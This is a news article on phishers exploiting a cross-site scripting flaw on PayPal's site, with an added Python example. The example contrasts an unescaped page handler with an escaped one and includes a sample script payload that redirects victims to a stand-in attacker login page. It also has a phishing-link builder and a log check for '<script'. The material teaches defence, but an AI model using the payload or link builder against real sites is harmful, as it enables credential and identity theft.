Exploited PayPal flaw allows identity theft

Netcraft recently reported on a flaw in the PayPal website that phishers were actively exploiting. The report explains how the fraudsters used a cross-site scripting (XSS) vulnerability on the genuine PayPal site to deceive its users.
Victims were shown, on the genuine PayPal site itself, an injected message that read, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short delay the victim was redirected to a third-party page that closely resembled the PayPal site.
The look-alike site asked the victim to log in with their normal PayPal credentials and then to enter further personal details, including credit card numbers, social security numbers and PINs.
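As an added illustration of the mechanism described above (example code written for this page, not PayPal's or Netcraft's; the parameter name `msg`, the hostnames, the page template and the log heuristic are hypothetical and do not describe the actual PayPal flaw), the following Python shows a page handler that reflects a query parameter into HTML unencoded beside the same handler with HTML output encoding, a payload shaped like the one the report describes, and a simple request-log check a responder could run:

```python
import html
from urllib.parse import parse_qs, quote, urlparse

# Added illustration, not PayPal's code: a page handler that reflects a query
# parameter into its HTML, written once without output encoding (reflected XSS)
# and once with it. The parameter name "msg", the hostnames and the template
# are constructed for this example.

PAGE_TEMPLATE = "<html><body><div id=\"notice\">{}</div></body></html>"


def render_vulnerable(msg: str) -> str:
    """Reflects the parameter verbatim, so any markup in it becomes live HTML."""
    return PAGE_TEMPLATE.format(msg)


def render_hardened(msg: str) -> str:
    """Encodes the parameter for an HTML text context: < > & " ' become entities.

    html.escape is the right primitive for element text and quoted attributes;
    JavaScript or URL contexts need their own encoders, not this one.
    """
    return PAGE_TEMPLATE.format(html.escape(msg, quote=True))


def handle_request(url: str, escape_output: bool) -> str:
    """Simulate the server: take ``msg`` from the query string and render it."""
    params = parse_qs(urlparse(url).query)
    msg = params.get("msg", [""])[0]
    return render_hardened(msg) if escape_output else render_vulnerable(msg)


# Constructed payload shaped like the one the article describes: a reassuring
# "account disabled" notice, then a delayed redirect to an attacker-controlled
# look-alike site (hypothetical hostname). The victim sees the genuine domain
# in the address bar while this script runs.
PAYLOAD = (
    "Your account is currently disabled because we think it has been accessed "
    "by a third party. You will now be redirected to Resolution Center."
    "<script>setTimeout(function(){"
    "location='https://resolution-center.attacker.example/login';},3000);"
    "</script>"
)


def build_phishing_link(genuine_site: str, payload: str) -> str:
    """The link a phisher would mail out: genuine host, attacker-chosen payload."""
    return f"{genuine_site}/notice?msg={quote(payload, safe='')}"


def has_live_script(rendered: str) -> bool:
    """Crude check used below: is there an unencoded <script tag in the page?"""
    return "<script" in rendered.lower()


def looks_like_xss_attempt(request_line: str) -> bool:
    """Log triage heuristic: flag requests carrying a raw or percent-encoded <script."""
    low = request_line.lower()
    return "<script" in low or "%3cscript" in low


if __name__ == "__main__":
    link = build_phishing_link("https://www.genuine-site.example", PAYLOAD)
    print("phishing link:", link)
    print("vulnerable page executes script:", has_live_script(handle_request(link, False)))
    print("hardened page executes script:  ", has_live_script(handle_request(link, True)))
    print("log heuristic flags link:", looks_like_xss_attempt(f"GET {link} HTTP/1.1"))
```

The point of the vulnerable variant is that the injected script runs in the origin of the genuine site, so the address bar and TLS certificate the victim checks are both legitimate; only the subsequent redirect leaves that origin. The hardened variant renders the same payload as inert text. Output encoding must match the context the data lands in (HTML text here); the same parameter dropped into a script block or a URL attribute would need a different encoder.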
Once PayPal became aware of the flaw it moved to close it, and the hole has since been fixed.
"As soon as we became aware of this scheme, we changed some of the code on the PayPal Web site. So this scheme, or any scheme like it, can no longer be effective," Amanda Pires, a PayPal spokeswoman, said in an interview.
She also stated that PayPal was working with the Internet service provider that hosts the malicious site to get it shut down, and that PayPal does not yet know how many people may have fallen victim to the scam.

